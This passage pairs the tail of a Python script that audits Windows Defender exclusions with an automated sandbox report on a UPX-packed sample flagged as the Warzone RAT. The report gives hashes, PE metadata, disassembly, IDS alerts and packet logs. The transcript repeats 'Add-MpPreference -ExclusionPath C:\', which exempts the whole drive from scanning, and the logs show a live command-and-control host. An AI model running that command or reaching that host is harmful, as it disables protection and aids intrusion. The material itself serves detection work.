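SAMPLE_TRANSCRIPT = (
    "**********************\r\nWindows PowerShell transcript start\r\n"
    "Start time: 20220522123355\r\nUsername: computer\\user\r\nRunAs User: computer\\user\r\n"
    "Configuration Name: \r\nMachine: 301389 (Microsoft Windows NT 10.0.17134.0)\r\n"
    "Host Application: powershell Add-MpPreference -ExclusionPath C:\\\r\nProcess ID: 6732\r\n"
    "PSVersion: 5.1.17134.1\r\n**********************\r\n**********************\r\n"
    "Command start time: 20220522123356\r\n**********************\r\n"
    "PS>Add-MpPreference -ExclusionPath C:\\\r\n"
    "**********************\r\nWindows PowerShell transcript start\r\n"
    "Start time: 20220522123336\r\nUsername: computer\\user\r\nRunAs User: computer\\user\r\n"
    "Host Application: powershell Add-MpPreference -ExclusionPath C:\\\r\nProcess ID: 6368\r\n"
    "**********************\r\nCommand start time: 20220522123336\r\n**********************\r\n"
    "PS>Add-MpPreference -ExclusionPath C:\\\r\n"
    # Made-up session, not from the report: a narrowly scoped exclusion for contrast.
    "**********************\r\nWindows PowerShell transcript start\r\n"
    "Start time: 20220522130000\r\nRunAs User: computer\\admin\r\n"
    "Host Application: powershell.exe\r\nProcess ID: 7000\r\n"
    "**********************\r\nPS>Add-MpPreference -ExclusionPath 'C:\\Build\\cache'\r\n"
)

if __name__ == "__main__":
    for finding in audit_defender_exclusions(SAMPLE_TRANSCRIPT):
        print(finding)
```

On a live host the same grading runs against (Get-MpPreference).ExclusionPath, and each Add-MpPreference call also lands in the Microsoft-Windows-Windows Defender/Operational log as Event ID 5007 (configuration changed), so the transcript parser is for the case where the sandbox artefacts are all you have. Remove-MpPreference -ExclusionPath C:\ undoes the change; check the Defender log for what was dropped while the exclusion was active.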
Process: C:\Windows\System32\wbem\WMIC.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 140
Entropy (8bit): 5.001523394375711
Encrypted: false
SSDEEP: 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys36JQAimXv:Yw7gJGWMXJXKSOdYiygKkXe/qeAiY
MD5: DA5950D62F7968DA1F66E3811A9061F9
SHA1: 69B83F624AA9EC9EA09BE0E165499B436101F9EA
SHA-256: C09AF5F39B8BF613C007465A63F70E84766710CEE7FEB62780433C9D8C248AD7
SHA-512: 6291C46BC66AEC7AEB973EE076146AF54C800A63F3F6F9C0EF01DA6535539E2F44FBF0BACBEAF66C4D34C4BE122AD728F62681E408FA710127120806D952DC9E
Malicious: false
Preview (WMIC output, line breaks restored):
    Executing (Win32_Process)->Create()
    Method execution successful.

    Out Parameters:
    instance of __PARAMETERS
    {
        ReturnValue = 9;
    };
File type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit): 7.862505245807072
TrID:
• Win32 Executable (generic) a (10002005/4) 99.66%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
File size: 222720
MD5: dabc6f0c75c134e5310ba3526adba833
SHA1: 854ec103a64182c97e8f25e45da04889dbbbf3ff
SHA256: 9f9bae001065a649a78ce6de997f160ef32d03a2c28f4633a8386f75c938cadf
SHA512: c596890bf6062890483e9ee276c890b04396c8c6c758b318ab0d218c506ae362db32e13faf9691b2b96d5a4ede03ee107c5b01714ab06c86c465ebd23326e877
SSDEEP: 6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
TLSH: 56241287323D8975D465A27C079AD56083B8FE074D9B853F615A338F4EBE472036EB20
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..............................................................................................1.......Y.............Rich...
Icon Hash: 00828e8e8686b000
Entrypoint: 0x553b50
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x62861233 [Thu May 19 09:47:31 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 12223521b494f53df3a1fd878d789144
Instruction (entrypoint disassembly, UPX1 section)
pushad
mov esi, 0051F000h
lea edi, dword ptr [esi-0011E000h]
mov dword ptr [edi+0014B3ACh], 0BA0189Ah
push edi
jmp 00007FDC94A25773h
nop
nop
nop
nop
nop
nop
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FDC94A2574Fh
mov eax, 00000001h
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007FDC94A2576Dh
jne 00007FDC94A2578Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FDC94A25781h
dec eax
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007FDC94A25736h
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007FDC94A257B4h
xor ecx, ecx
sub eax, 03h
jc 00007FDC94A25773h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007FDC94A257D7h
sar eax, 1
mov ebp, eax
jmp 00007FDC94A2576Dh
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FDC94A2572Eh
inc ecx
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007FDC94A25720h
add ebx, ebx
jne 00007FDC94A25769h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007FDC94A25751h
jne 00007FDC94A2576Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007FDC94A25746h
add ecx, 02h
cmp ebp, 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x154e5c | 0x1c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x154000 | 0xe5c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15501c | 0x28 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x153d4c | 0x18 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x153d6c | 0xc0 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x11e000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1 | 0x11f000 | 0x35000 | 0x35000 | False | 0.97481666421 | data | 7.88845284004 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x154000 | 0x2000 | 0x1200 | False | 0.366102430556 | data | 3.93920974475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
TYPELIB | 0x15418c | 0x834 | data | English | United States
RT_DIALOG | 0x14dce0 | 0x1ae | data | English | United States
RT_STRING | 0x14de90 | 0x2e | data | English | United States
RT_VERSION | 0x1549c4 | 0x314 | data | English | United States
RT_MANIFEST | 0x154cdc | 0x17d | XML 1.0 document text | English | United States
DLL | Import
ADVAPI32.dll | AccessCheck
GDI32.dll | GetTextExtentPoint32A
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ole32.dll | CoInitialize
OLEAUT32.dll | SysFreeString
SHELL32.dll | SHGetFileInfoA
USER32.dll | GetDC
Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | ATLDUCK
FileVersion | 1, 0, 0, 1
CompanyName |
ProductName | atlduck Module
OLESelfRegister |
ProductVersion | 1, 0, 0, 1
FileDescription | atlduck Module
OriginalFilename | ATLDUCK.DLL
Translation | 0x0409 0x04b0

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/22/22-12:33:29.604971 | TCP | 2834979 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
05/22/22-12:33:29.434739 | TCP | 2841903 | ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP)
                                                                  May 22, 2022 12:33:30.954734087 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954746962 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954794884 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954842091 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954902887 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954904079 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.954952002 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.954972029 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955004930 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955050945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955095053 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955111027 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955157995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955192089 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955204964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955245972 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955284119 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955296040 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955341101 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955401897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955403090 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955445051 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955492020 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955504894 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955549002 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955602884 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955605984 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955648899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955689907 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955702066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955745935 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955780983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955804110 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955837011 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955877066 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.955888987 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955929995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955982924 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.955996990 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:30.956037045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:30.956114054 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:31.978198051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114612103 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114674091 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114716053 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114753962 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114794016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114847898 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114859104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114890099 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114902973 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114933968 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.114948988 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.114978075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115017891 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115056992 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115061045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115070105 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115103006 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115140915 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115181923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115184069 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115221024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115261078 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115278006 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115303993 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115319967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115344048 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115384102 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115401030 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115425110 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115463018 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115504026 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115536928 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115542889 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115573883 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115585089 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115628004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115665913 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115673065 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115709066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115747929 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115766048 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.115789890 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115830898 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115861893 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115891933 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115921974 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115962982 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.115998983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116003990 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116041899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116086006 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116100073 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116110086 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116125107 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116166115 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116197109 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116228104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116256952 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116269112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116309881 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116349936 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116381884 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116390944 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116430044 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116471052 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116482973 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116492987 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.116558075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116597891 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116626024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.116679907 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249263048 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249324083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249363899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249375105 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249404907 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249445915 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249466896 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249486923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249504089 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249527931 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249567032 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249608040 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249624968 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249646902 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249659061 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249676943 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249716043 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249756098 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249780893 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249794960 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249826908 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249855995 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249897003 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249898911 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249933958 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.249938965 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.249979973 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250020981 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250032902 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250061035 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250103951 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250121117 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250144005 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250185013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250204086 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250226974 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250266075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250284910 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250307083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250345945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250365019 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250384092 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250423908 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250442028 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250463009 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250504017 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250524998 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250545025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250585079 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250606060 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250624895 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250665903 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250683069 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250705004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250745058 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250761032 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250785112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250827074 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250844955 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250868082 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250906944 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250926018 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.250946999 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.250987053 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251004934 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.251025915 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251065016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251082897 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.251113892 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251156092 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251173019 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.251197100 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251223087 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.251260042 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.384396076 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384455919 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384533882 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.384557962 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384603024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384640932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384664059 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.384680986 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384723902 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384762049 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384778023 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.384804964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384848118 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384884119 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:33:32.384887934 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384928942 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:33:32.384939909 CEST497408080192.168.2.323.227.202.157
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 22, 2022 12:33:32.384969950 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.384998083 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385010958 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385054111 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385080099 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385098934 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385140896 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385163069 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385181904 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385224104 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385266066 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385283947 CEST | 49740 | 8080 | 192.168.2.3 | 23.227.202.157
May 22, 2022 12:33:32.385305882 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385346889 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
May 22, 2022 12:33:32.385377884 CEST | 8080 | 49740 | 23.227.202.157 | 192.168.2.3
